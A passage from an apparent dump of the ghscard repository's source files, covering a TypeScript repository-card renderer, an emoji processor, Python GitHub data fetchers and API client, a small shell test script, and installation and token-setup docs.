labels: [${languageLabelArray.join(\", \")}],\n datasets: [{\n data: [${this.getCardData(\"languages\")[\"data\"]}],\n backgroundColor: Please.make_color({\n colors_returned: ${this.getCardData(\"languages\")[\"labels\"].length},\n }),\n }]\n },\n options: ${JSON.stringify(this.getPieChartOption())},\n });\n}\n`;\n }\n\n private createCommitChartScript(): string {\n let fetchDate = dayjs(this.getCardData(\"fetched_at\"));\n const dateArray = [];\n\n for (let i = 0; i < 52; i++) {\n console.log(fetchDate.format(\"YYYY-MM-DD\"));\n dateArray.push(`moment('${fetchDate.format(\"YYYY-MM-DD\")}').toDate()`);\n fetchDate = fetchDate.subtract(1, \"week\");\n }\n dateArray.reverse();\n\n const script = `\nvar commitsCanvas = document.getElementById('${CanvasId.COMMITS_CHART}');\nif (commitsCanvas) {\n commitsCanvas.width = ${this.getChartWidth()};\n var commitsChart = new Chart(commitsCanvas, {\n type: 'line',\n data: {\n labels: [${dateArray.join(\", \")}],\n datasets: [{\n label: 'Commits',\n data: [${this.getCardData(\"participation\")}],\n fill: true,\n backgroundColor: 'rgba(136, 211, 161, 0.9)',\n borderWidth: 0,\n pointRadius: 0.5,\n pointHitRadius: 8,\n showLine: true,\n }]\n },\n options: {\n responsive: false,\n title: {\n display: true,\n fontSize: ${this.chartTitleFontSize},\n text: '${this.getCardData(\"commits_last_year\")} commits in the last year'\n },\n legend: { display: false },\n scales:{\n xAxes: [{\n type: 'time',\n time: { parser: 'MM/YYYY', tooltipFormat: 'YYYY wo [week]' },\n gridLines: { display: false },\n ticks: { minRotation: 25, fontSize: ${this.chartTickFontSize} },\n }],\n yAxes: [{\n ticks: { min: 0 },\n scaleLabel: { display: true, labelString: 'Commits' },\n }],\n },\n }\n });\n}`;\n return script;\n }\n\n protected createCardHeader(): HTMLElement {\n const header = this.createElement(\"div\", `ui dividing ${this.headerSize} header`);\n header.appendChild(this.createOwnerAvatar());\n header.appendChild(this.createPopup());\n\n let subheaderText = this.getCardData(\"owner_name\");\n if (subheaderText == null) {\n subheaderText = this.getCardData(\"organization\")[\"name\"];\n }\n if (subheaderText != null) {\n const subheader = this.createElement(\"div\", \"sub header\");\n subheader.appendChild(this._doc.createTextNode(subheaderText));\n\n header.appendChild(this.createContentElement([this.createRepositoryName(), subheader]));\n }\n\n const latestTag = this.getCardData(\"latest_tag\");\n if (typeof latestTag === \"string\" && latestTag) {\n header.appendChild(this.createTagLabel());\n }\n\n return header;\n }\n\n private getChartWidth(): number {\n const marginWidth = 32;\n const cardWidth = this.cardWidth;\n const chartWidth = cardWidth - marginWidth;\n\n return chartWidth > marginWidth ? chartWidth : cardWidth;\n }\n\n private getCardData(key: RepoCardDataKey): string {\n return this._cardData[key];\n }\n\n protected getColor(): UiColor {\n if (this.color != null) {\n return this.toUiColor(this.color);\n }\n\n const defaultColor: UiColor = \"grey\";\n if (this.language == null) {\n return defaultColor;\n }\n\n let color: UiColor = this.colorMap[this.language];\n if (typeof color !== \"undefined\") {\n return color;\n }\n\n color = this.colorMap[this.language.charAt(0).toLowerCase()];\n if (typeof color !== \"undefined\") {\n return color;\n }\n\n return defaultColor;\n }\n\n private getDescription(): string {\n const text = this.getCardData(\"description\");\n if (text == null) {\n return \"no description\";\n }\n\n return text;\n }\n\n protected createCardContent(): HTMLElement {\n const segmentClassName = \"ui vertical basic compact segment\";\n\n const childArray = [\n this.createCardHeader(),\n this.createElementWithChild(segmentClassName, [\n this.createDescription(this.getDescription()),\n ]),\n ];\n\n {\n const infoArray = [];\n\n const cardInfoList = this.createCardInfoList();\n if (cardInfoList) {\n infoArray.push(cardInfoList);\n }\n\n const detailInfoList = this.createDetailInfoList();\n if (detailInfoList) {\n infoArray.push(detailInfoList);\n }\n\n if (infoArray.length > 0) {\n childArray.push(this.createElementWithChild(segmentClassName, infoArray));\n }\n }\n\n if (this.isDisplayCommitChart()) {\n childArray.push(\n this.createElementWithChild(segmentClassName, [this.createCommitChart()])\n );\n }\n\n if (this.isDisplayTopic()) {\n const topicsLabelList = [];\n for (const labelText of this.getCardData(\"topics\")) {\n topicsLabelList.push(this.createTopicLabelElement(labelText, this.topicSize));\n }\n if (topicsLabelList.length > 0) {\n childArray.push(this.createElementWithChild(segmentClassName, topicsLabelList));\n }\n }\n\n return this.createContentElement(childArray);\n }\n\n private createCommitChart(): HTMLElement {\n const canvas = this._doc.createElement(\"canvas\");\n canvas.id = CanvasId.COMMITS_CHART;\n canvas.height = this.lineChartHeight;\n\n return canvas;\n }\n\n protected createExtraCardContent(): HTMLElement {\n const grid = this.createElement(\"div\", \"ui equal width center middle aligned grid\");\n\n const languageLabel = this.createLanguageLabel();\n if (languageLabel) {\n grid.appendChild(this.createColumn(languageLabel, \"six wide\"));\n }\n grid.appendChild(this.createColumn(this.createStars()));\n grid.appendChild(this.createColumn(this.createForks()));\n\n const extraContent = this.createElement(\"div\", \"extra content\");\n extraContent.appendChild(grid);\n\n return extraContent;\n }\n\n protected createPopupInfoList(): HTMLElement {\n const displayMapping = {\n subscribers_count: true,\n open_issues_count: true,\n branches_count: true,\n contributors_count: true,\n created_at: true,\n updated_at: true,\n };\n\n return this._createInfoList(displayMapping, this.popupSize);\n }\n\n protected createCardInfoList(): HTMLElement {\n const displayMapping = {\n repo_homepage: true,\n wiki: true,\n pulls_count: true,\n license: true,\n };\n\n if (!this.isDisplayChart()) {\n displayMapping[\"open_issues_count\"] = true;\n }\n\n return this._createInfoList(displayMapping, this.infoSize);\n }\n\n protected createDetailInfoList(): HTMLElement {\n if (!this.isDisplayChart()) {\n return null;\n }\n\n const accordion = this.createElement(\"div\", \"ui accordion\");\n\n if (this.getCardData(\"open_issues_count\")) {\n const title = this.createElementWithChild(\"title\", [\n this.createElement(\"i\", \"dropdown icon\"),\n this._doc.createTextNode(\"Open issues\"),\n this.createLabelElement(\n String(this.getCardData(\"open_issues_count\")),\n this.infoSize\n ),\n ]);\n accordion.appendChild(title);\n\n const canvas = this._doc.createElement(\"canvas\");\n canvas.id = CanvasId.ISSUES_CHART;\n canvas.height = this.pieChartHeight;\n\n accordion.appendChild(this.createContentElement([canvas]));\n }\n\n if (Number(this.getCardData(\"languages_count\")) > 1) {\n const title = this.createElementWithChild(\"title\", [\n this.createElement(\"i\", \"dropdown icon\"),\n this._doc.createTextNode(\"Languages\"),\n this.createLabelElement(String(this.getCardData(\"languages_count\")), this.infoSize),\n ]);\n accordion.appendChild(title);\n\n const canvas = this._doc.createElement(\"canvas\");\n canvas.id = CanvasId.LANGUAGES_CHART;\n canvas.height = this.pieChartHeight;\n\n accordion.appendChild(this.createContentElement([canvas]));\n }\n\n if (accordion.children.length === 0) {\n return null;\n }\n\n return accordion;\n }\n\n protected _createInfoList(displayMapping: object, size: UiSize = null): HTMLElement {\n if (size === null) {\n size = this.infoSize;\n }\n\n const itemClassName = \"item\";\n const infoList = this.createElement(\"div\", `ui ${size} list`);\n\n if (displayMapping[\"repo_homepage\"]) {\n const element = this.createHomepageElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"wiki\"]) {\n const element = this.createWikiElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (\n displayMapping[\"subscribers_count\"] &&\n Number(this.getCardData(\"subscribers_count\")) > 0\n ) {\n const element = this.createWatchersElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (\n displayMapping[\"open_issues_count\"] &&\n Number(this.getCardData(\"open_issues_count\")) > 0\n ) {\n const element = this.createIssuesElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"pulls_count\"] && Number(this.getCardData(\"pulls_count\")) > 0) {\n const element = this.createPullsElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"branches_count\"] && Number(this.getCardData(\"branches_count\")) > 0) {\n const element = this.createBranchElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (\n displayMapping[\"contributors_count\"] &&\n Number(this.getCardData(\"contributors_count\")) > 0\n ) {\n const element = this.createContributorsElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"license\"]) {\n const element = this.createLicenseElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"created_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Created at\", \"wait icon\", itemClassName)\n );\n }\n\n if (displayMapping[\"updated_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\n \"updated_at\",\n \"Updated at\",\n \"history icon\",\n itemClassName\n )\n );\n }\n\n if (infoList.children.length === 0) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Created at\", \"wait icon\", \"item\")\n );\n }\n\n return infoList;\n }\n\n private createTopicLabelElement(topic: string, size: UiSize): HTMLElement {\n const label = this.createAnchorElement(\n `//github.com/search?q=topic%3A${topic}&type=Repositories`,\n `ui blue horizontal basic ${size} label`\n );\n label.appendChild(this._doc.createTextNode(topic));\n label.title = `topic: ${topic}`;\n\n return label;\n }\n\n private createHomepageElement(className: string): HTMLElement {\n const homepageUrl: string = this.getCardData(\"repo_homepage\");\n\n if (homepageUrl == null) {\n console.debug(`homepage not found in ${this.htmlUrl}`);\n return null;\n }\n\n const linkElement = this.createAnchorElement(homepageUrl, \"content\");\n linkElement.title = \"Repository homepage\";\n linkElement.appendChild(this._doc.createTextNode(this.escapeHtml(linkElement.hostname)));\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"home icon\"),\n linkElement,\n ]);\n }\n\n private createWikiElement(className: string): HTMLElement {\n if (!this.getCardData(\"has_wiki\")) {\n console.debug(`wiki not found in ${this.htmlUrl}`);\n return null;\n }\n\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/wiki`, \"content\");\n linkElement.title = \"Repository wiki\";\n linkElement.appendChild(this._doc.createTextNode(\"Wiki\"));\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"book icon\"),\n linkElement,\n ]);\n }\n\n private createWatchersElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/watchers`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Watchers\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"subscribers_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"unhide icon\"),\n linkElement,\n ]);\n }\n\n private createIssuesElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/issues`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Issues\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"open_issues_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"warning circle icon\"),\n linkElement,\n ]);\n }\n\n private createPullsElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/pulls`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Pull requests\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"pulls_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"sign in icon\"),\n linkElement,\n ]);\n }\n\n private createBranchElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/branches`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Branches\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"branches_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"fork icon\"),\n linkElement,\n ]);\n }\n\n private createContributorsElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(\n `${this.htmlUrl}/graphs/contributors`,\n \"content\"\n );\n linkElement.appendChild(this._doc.createTextNode(\"Contributors\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"contributors_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"users icon\"),\n linkElement,\n ]);\n }\n\n private createLicenseElement(className: string): HTMLElement {\n const licenseData = this.getCardData(\"license\");\n\n if (licenseData == null || licenseData[\"spdx_id\"] == null) {\n return null;\n }\n\n const licenseElement: HTMLElement = this.createElement(\"div\", className);\n licenseElement.appendChild(this.createElement(\"i\", \"law icon\"));\n licenseElement.appendChild(\n this.createContentElement([this._doc.createTextNode(licenseData[\"spdx_id\"])])\n );\n licenseElement.title = licenseData[\"name\"];\n\n return licenseElement;\n }\n\n private createRepositoryName(): HTMLElement {\n let repoLink: HTMLElement;\n if (this.htmlUrl) {\n repoLink = this.createAnchorElement(this.htmlUrl);\n } else {\n repoLink = this._doc.createElement(\"div\");\n }\n\n repoLink.appendChild(this._doc.createTextNode(this.getCardData(\"name\")));\n\n return repoLink;\n }\n\n private createOwnerAvatar(): HTMLElement {\n const avatar = this.createImageElement(this.getCardData(\"avatar_url\"), \"ui avatar image\");\n avatar.id = AVATAR_ELEMENT_ID;\n\n return avatar;\n }\n\n private createTagLabel(): HTMLElement {\n const tagLabel = this.createAnchorElement(\n `${this.htmlUrl}/releases`,\n `ui ${this.releaseTagColor} ${this.versionLabelSize} label`\n );\n tagLabel.title = \"Latest tag\";\n tagLabel.appendChild(this._doc.createTextNode(this.getCardData(\"latest_tag\")));\n tagLabel.setAttribute(\"data-tooltip\", `${this.getCardData(\"tags_count\")} releases`);\n tagLabel.setAttribute(\"data-inverted\", \"\");\n tagLabel.setAttribute(\"data-position\", \"bottom center\");\n\n return tagLabel;\n }\n\n private createLanguageLabel(): HTMLElement {\n if (!this.language) {\n return null;\n }\n\n const languageElement = this.createElement(\"div\", `ui ${this.getColor()} label`);\n languageElement.title = \"Language\";\n languageElement.appendChild(this._doc.createTextNode(this.language));\n\n return languageElement;\n }\n\n private createStars(): HTMLElement {\n const icon = this.createElement(\"i\", \"star black icon\");\n icon.title = \"Stargazers\";\n\n let stargazersLink: HTMLElement;\n if (this.htmlUrl) {\n stargazersLink = this.createAnchorElement(`${this.htmlUrl}/stargazers`);\n } else {\n stargazersLink = this._doc.createElement(\"div\");\n }\n stargazersLink.title = \"Stargazers count\";\n stargazersLink.appendChild(icon);\n stargazersLink.appendChild(this._doc.createTextNode(this.getCardData(\"stargazers_count\")));\n\n return stargazersLink;\n }\n\n private createForks(): HTMLElement {\n const icon = this.createElement(\"i\", \"fork black icon\");\n icon.title = \"Forks\";\n\n let forksLink: HTMLElement;\n if (this.htmlUrl) {\n forksLink = this.createAnchorElement(`${this.htmlUrl}/network`);\n } else {\n forksLink = this._doc.createElement(\"div\");\n }\n forksLink.title = \"Forks count\";\n forksLink.appendChild(icon);\n forksLink.appendChild(this._doc.createTextNode(this.getCardData(\"forks_count\")));\n\n return forksLink;\n }\n\n private colorMap: object;\n}\n" }, { "alpha_fraction": 0.6175794005393982, "alphanum_fraction": 0.6194201707839966, "avg_line_length": 26.506328582763672, "blob_id": "1c157e7725b12f44fd53821853dc0a390126fb85", "content_id": "f10705fba2c424e24622c89b1f20daa4675e6434", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2173, "license_type": "permissive", "max_line_length": 116, "num_lines": 79, "path": "/src/emoji.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { Emoji } from \"./const\";\n\nexport interface EmojiProcessorInterface {\n processEmoji(text: string): string\n}\n\nclass AbstractEmojiProcessor implements EmojiProcessorInterface {\n public processEmoji(_text: string): string {\n throw new Error(\"not implemented\");\n }\n\n protected readonly _regexpEmoji = new RegExp(\":[a-zA-Z0-9_-]+:\", \"gm\");\n}\n\nclass EmojiNop extends AbstractEmojiProcessor {\n public processEmoji(text: string): string {\n return text;\n }\n}\n\nclass EmojiRemover extends AbstractEmojiProcessor {\n public processEmoji(text: string): string {\n return text.replace(this._regexpEmoji, \"\");\n }\n}\n\nclass EmojiResolver extends AbstractEmojiProcessor {\n constructor(private emojiMapping) {\n super();\n }\n\n public processEmoji(text: string): string {\n const matchList: RegExpMatchArray = text.match(this._regexpEmoji);\n\n if (matchList === null) {\n return text;\n }\n\n const replaceMapping = new Object();\n\n for (const emojiText of matchList) {\n const emojiId = emojiText.substr(1, emojiText.length - 2);\n const tag = `<img src='${this.emojiMapping[emojiId]}' width='${Emoji.WIDTH}' height='${Emoji.HEIGHT}'>`;\n replaceMapping[emojiText] = tag;\n }\n\n for (const emojiText in replaceMapping) {\n text = text.replace(new RegExp(emojiText, \"g\"), replaceMapping[emojiText]);\n }\n\n return text;\n }\n}\n\nexport class EmojiProcessorFactory {\n public static create(processorType: string, emojiMapping: object): EmojiProcessorInterface {\n console.debug(`emoji processor type: ${processorType}`);\n\n if (processorType === null) {\n return new EmojiResolver(emojiMapping);\n }\n\n if (processorType === \"nop\") {\n return new EmojiNop();\n }\n\n if (processorType === \"remove\") {\n return new EmojiRemover();\n }\n\n if (processorType === \"resolve\") {\n return new EmojiResolver(emojiMapping);\n }\n\n console.error(`unknown emoji processor type: ${processorType}`);\n\n return new EmojiNop();\n }\n}\n" }, { "alpha_fraction": 0.6530333757400513, "alphanum_fraction": 0.6540558934211731, "avg_line_length": 36.13924026489258, "blob_id": "1f3801e9e29b1527d05c89eafb0b7fd93ab0f1ba", "content_id": "97310f96c3f212b14c21a2dc2ec2d31396a0f592", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2934, "license_type": "permissive", "max_line_length": 99, "num_lines": 79, "path": "/ghscard/fetcher/_user.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport collections\nfrom multiprocessing.pool import AsyncResult # noqa\nfrom typing import Any, Counter, Dict, List, Optional, Union # noqa\n\nfrom .._const import DATETIME_FORMAT, CardType, CommonCardKey\nfrom ._base import AbstractCardDataFetcher, CardData\nfrom ._common import dump_organization, to_chart_data\n\n\ndef ghc_starred_count_helper(ghc_client) -> Dict[str, int]:\n return {\"stars\": ghc_client.starred_count}\n\n\ndef ghc_organizations_helper(user) -> Dict[str, List[Dict[str, str]]]:\n return {\"organizations\": [dump_organization(organization) for organization in user.get_orgs()]}\n\n\ndef ghc_languages_helper(user) -> Dict[str, Dict[str, list]]:\n language_mapping = collections.Counter() # type: Counter\n\n for repo in user.get_repos():\n language_mapping[repo.language] += 1\n\n try:\n del language_mapping[None]\n except KeyError:\n pass\n\n return {\"languages\": to_chart_data(language_mapping, 5)}\n\n\nclass UserCardDataFetcher(AbstractCardDataFetcher):\n @property\n def type(self) -> str:\n return CardType.USER\n\n def fetch(self) -> CardData:\n self._logger.debug(f\"fetching user data: id={self.id}\")\n\n card_data = super().fetch()\n user = self._pygh_client.get_user(self.id)\n\n thread_list = [\n self._pool.apply_async(ghc_starred_count_helper, args=[self._ghc_client]),\n self._pool.apply_async(ghc_organizations_helper, args=[user]),\n self._pool.apply_async(ghc_languages_helper, args=[user]),\n ] # type: List[AsyncResult]\n\n # this will raise UnknownObjectException when failed to get data\n card_data[\"profile_name\"] = user.name\n\n card_data[CommonCardKey.AVATAR_URL] = user.avatar_url\n card_data[CommonCardKey.CARD_TYPE] = CardType.USER\n card_data[CommonCardKey.CREATED_AT] = user.created_at.strftime(DATETIME_FORMAT)\n card_data[CommonCardKey.DESCRIPTION] = user.bio\n card_data[CommonCardKey.EMOJIS] = self._get_emoji_mapping(user.bio)\n card_data[CommonCardKey.HTML_URL] = user.html_url\n card_data[CommonCardKey.NAME] = self.id\n card_data[CommonCardKey.UPDATED_AT] = user.updated_at.strftime(DATETIME_FORMAT)\n card_data[\"blog\"] = user.blog\n card_data[\"company\"] = user.company\n card_data[\"email\"] = user.email\n card_data[\"followers\"] = user.followers\n card_data[\"following\"] = user.following\n card_data[\"location\"] = user.location\n card_data[\"public_gists\"] = user.public_gists\n card_data[\"public_repos\"] = user.public_repos\n\n for i, thread in enumerate(thread_list):\n thead_id = \"thread {:d}/{:d}\".format(i + 1, len(thread_list))\n self._logger.debug(\"wait for {}\".format(thead_id))\n card_data.update(thread.get())\n self._logger.debug(\"complete {}\".format(thead_id))\n\n return card_data\n" }, { "alpha_fraction": 0.62848299741745, "alphanum_fraction": 0.62848299741745, "avg_line_length": 15.149999618530273, "blob_id": "98f47e7d14b9f4bc93ceb1797b8f406ad788c689", "content_id": "11867dc091663ac8cf0753fb8a1921d332ec6630", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 323, "license_type": "permissive", "max_line_length": 56, "num_lines": 20, "path": "/test/html/fetch_gh_data_test.sh", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\noutput_dir=\"data\"\nbase_command=\"ghscard gen\"\ntargets=(\n \"thombashi\"\n \"kentcdodds\"\n \"kennethreitz\"\n\n \"angular\"\n\n \"angular/angular\"\n \"pallets/flask\"\n \"Microsoft/TypeScript\"\n \"thombashi/null\"\n)\n\ncommand=\"${base_command} -o ${output_dir} ${targets[@]}\"\necho \"${command}\"\n${command}\n" }, { "alpha_fraction": 0.5703004598617554, "alphanum_fraction": 0.5724191069602966, "avg_line_length": 29.541175842285156, "blob_id": "c117c12e60befb8f2299f20e28ca6d1043246a1f", "content_id": "b90d1e0fa9aa43ef4c279e086dfb0cb866ad2d6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5192, "license_type": "permissive", "max_line_length": 99, "num_lines": 170, "path": "/ghscard/_github_client.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport re\nfrom typing import Dict\n\nimport msgfy\nimport retryrequests\nimport typepy\nfrom github.GithubException import RateLimitExceededException\n\nfrom ._const import MAX_PER_PAGE\nfrom ._emoji import EmojiParser\nfrom ._stopwatch import stopwatch\n\n\nclass GitHubClient:\n @property\n def emojis(self) -> Dict[str, str]:\n if self.__emojis: # type: ignore\n return self.__emojis # type: ignore\n\n self.__emojis = self.get(\"/emojis\")\n\n return self.__emojis\n\n @property\n def emoji_parser(self) -> EmojiParser:\n if self.__emoji_parser: # type: ignore\n return self.__emoji_parser # type: ignore\n\n self.__emoji_parser = EmojiParser(self.emojis)\n\n return self.__emoji_parser\n\n @property\n def repo(self):\n if self.__repos:\n return self.__repos\n\n self.__repos = self.get(\n f\"/repos/{self.__github_id:s}\",\n headers={\"accept\": \"application/vnd.github.drax-preview+json\"},\n )\n # get license: https://developer.github.com/v3/licenses/\n\n return self.__repos\n\n @property\n def branches_count(self) -> int:\n return self.__get_count(\"branches\")\n\n @property\n def contributors_count(self) -> int:\n return self.__get_count(\"contributors\")\n\n @property\n def pulls_count(self) -> int:\n return self.__get_count(\"pulls\")\n\n @property\n def tags_count(self) -> int:\n return self.__get_count(\"tags\")\n\n @property\n def starred_count(self) -> int:\n return self.__get_count(\"starred\")\n\n def __init__(self, logger, github_id, access_token=None):\n self._logger = logger\n self.__github_id = github_id\n self.__access_token = access_token\n\n self.__emojis = None\n self.__emoji_parser = None\n self.__repos = None\n\n def get(self, operation: str, headers: dict = None, params: dict = None) -> dict:\n if not headers:\n headers = {}\n\n if not params:\n params = {}\n\n if typepy.is_not_null_string(self.__access_token):\n headers[\"authorization\"] = f\"token {self.__access_token:s}\"\n\n api_url = f\"https://api.github.com{operation:s}\"\n response = retryrequests.get(api_url, headers=headers, params=params)\n self._logger.debug(f\"API called: {response.url}\")\n\n try:\n response_json = response.json()\n except ValueError:\n return {}\n\n try:\n message = response_json.get(\"message\")\n except AttributeError:\n return response_json\n\n if message:\n if re.search(\".* list is too large to list .* via the API\", message):\n raise OSError(message)\n\n if response.status_code == 403 and re.search(\"^API rate limit exceeded for \", message):\n raise RateLimitExceededException(status=response.status_code, data=message)\n\n return response_json\n\n def get_page(self, operation: str, page) -> dict:\n return self.get(operation, params={\"per_page\": str(MAX_PER_PAGE), \"page\": page})\n\n def _get_branches(self, page) -> dict:\n # https://developer.github.com/v3/repos/branches/\n return self.get_page(f\"/repos/{self.__github_id:s}/branches\", page=page)\n\n def _get_contributors(self, page) -> dict:\n return self.get_page(f\"/repos/{self.__github_id:s}/contributors\", page=page)\n\n def _get_pulls(self, page) -> dict:\n # https://developer.github.com/v3/pulls/\n return self.get_page(f\"/repos/{self.__github_id:s}/pulls\", page=page)\n\n def _get_tags(self, page) -> dict:\n # https://developer.github.com/v3/git/tags/\n return self.get_page(f\"/repos/{self.__github_id:s}/tags\", page=page)\n\n def _get_releases(self, page) -> dict:\n # https://developer.github.com/v3/repos/releases/\n return self.get_page(f\"/repos/{self.__github_id:s}/releases\", page=page)\n\n def _get_starred(self, page) -> dict:\n return self.get_page(f\"/users/{self.__github_id:s}/starred\", page=page)\n\n def __get_count(self, param_name: str) -> int:\n attr_template = \"__{:s}\"\n method_template = \"_get_{:s}\"\n\n try:\n count = getattr(self, attr_template.format(param_name))\n if count:\n return count\n except AttributeError:\n pass\n\n total_count = 0\n page = 1\n\n with stopwatch(self._logger, f\"get {param_name:s}\"):\n while True:\n method_name = method_template.format(param_name)\n with stopwatch(self._logger, f\"{method_name:s} page {page:d}\"):\n try:\n subtotal_count = len(getattr(self, method_name)(page))\n except OSError as e:\n self._logger.debug(msgfy.to_debug_message(e))\n # total_count = None\n break\n\n if not subtotal_count:\n break\n\n total_count += subtotal_count\n page += 1\n\n setattr(self, attr_template.format(param_name), total_count)\n\n return total_count\n" }, { "alpha_fraction": 0.6269744634628296, "alphanum_fraction": 0.6275820136070251, "avg_line_length": 25.126983642578125, "blob_id": "b8ff68511b8116553b645a2a9f295151aa26950f", "content_id": "6eac6349c7d7063743d83af3c3fbaee746cd6df7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1646, "license_type": "permissive", "max_line_length": 87, "num_lines": 63, "path": "/ghscard/fetcher/_base.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport abc\nimport datetime\nimport multiprocessing\nfrom typing import Dict, List, Union\n\nimport github\n\nfrom .._const import CARD_DATA_VERSION, DATETIME_FORMAT, CommonCardKey, Result\nfrom .._github_client import GitHubClient\nfrom ._common import ChartData\n\n\nEmojiMap = Dict[str, str]\nTopics = List[str]\nCardData = Dict[str, Union[int, str, None, ChartData, EmojiMap, Topics]]\n\n\nclass AbstractCardDataFetcher(metaclass=abc.ABCMeta):\n @abc.abstractproperty\n def type(self) -> str: # pragma: no cover\n pass\n\n @property\n def id(self) -> str:\n return self.__id\n\n def __init__(\n self, pygh_client: github.Github, ghc_client: GitHubClient, id: str, logger\n ) -> None:\n self.__id = id\n self._logger = logger\n\n self._pygh_client = pygh_client\n self._ghc_client = ghc_client\n\n self._pool = multiprocessing.Pool(processes=4)\n\n def fetch(self) -> CardData:\n return {\n CommonCardKey.ID: self.id,\n CommonCardKey.FETCHD_AT: datetime.datetime.now().strftime(DATETIME_FORMAT),\n CommonCardKey.VERSION: CARD_DATA_VERSION,\n CommonCardKey.RESULT: Result.SUCCESS,\n }\n\n def terminate(self) -> None:\n self._pool.terminate()\n\n def _get_emoji_mapping(self, text) -> EmojiMap:\n try:\n emoji_list = self._ghc_client.emoji_parser.parse(text)\n except ValueError:\n emoji_list = []\n\n emoji_mapping = {}\n for emoji in emoji_list:\n emoji_mapping[emoji] = self._ghc_client.emoji_parser.get_url(emoji)\n\n return emoji_mapping\n" }, { "alpha_fraction": 0.6469465494155884, "alphanum_fraction": 0.6488549709320068, "avg_line_length": 33.86666488647461, "blob_id": "f90584f535ccb7d1bdd3ae1b11027010cb040891", "content_id": "341917ad35850d9b7ac19167b2b687cc5969b56f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 524, "license_type": "permissive", "max_line_length": 90, "num_lines": 15, "path": "/docs/pages/usage/advanced_usage.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Advanced Usage\n==========================\n\nGitHub API Token Setting\n--------------------------------------\nYou can set GitHub API token via ``ghscard configure`` command to workaround \n`GitHub API rate limit <//developer.github.com/v3/#rate-limiting>`__.\nYou might exceed GitHub API rate limit when creating card data by ``ghscard gen`` command.\nGit Hub API token can create at https://github.com/settings/tokens/new\n\n::\n\n $ ghscard configure\n GitHub API Personal Access Token: <token>\n Output Directory Path [.]:\n\n" }, { "alpha_fraction": 0.5826271176338196, "alphanum_fraction": 0.5868644118309021, "avg_line_length": 26.764705657958984, "blob_id": "5171b2051146ac4c6aa777ab816ba9d2d78065f5", "content_id": "654d54eb7d483ee27b5323a01dc198afe7bfff4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 472, "license_type": "permissive", "max_line_length": 119, "num_lines": 17, "path": "/docs/pages/introduction/installation.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "CLI Tool Installation\n====================================\nInstall ``ghscard`` CLI tool from `PyPI <//pypi.python.org/pypi>`__ via\n`pip <//pip.pypa.io/en/stable/installing/>`__ (Python package manager) command.\n\n::\n\n pip install ghscard\n\n\nDependencies\n====================================\n\nCLI Tool Dependencies\n----------------------\n- Python 3.6+\n- `Python package dependencies (automatically installed) <https://github.com/thombashi/ghscard/network/dependencies>`__\n" }, { "alpha_fraction": 0.6403310894966125, "alphanum_fraction": 0.6425884366035461, "avg_line_length": 21.525423049926758, "blob_id": 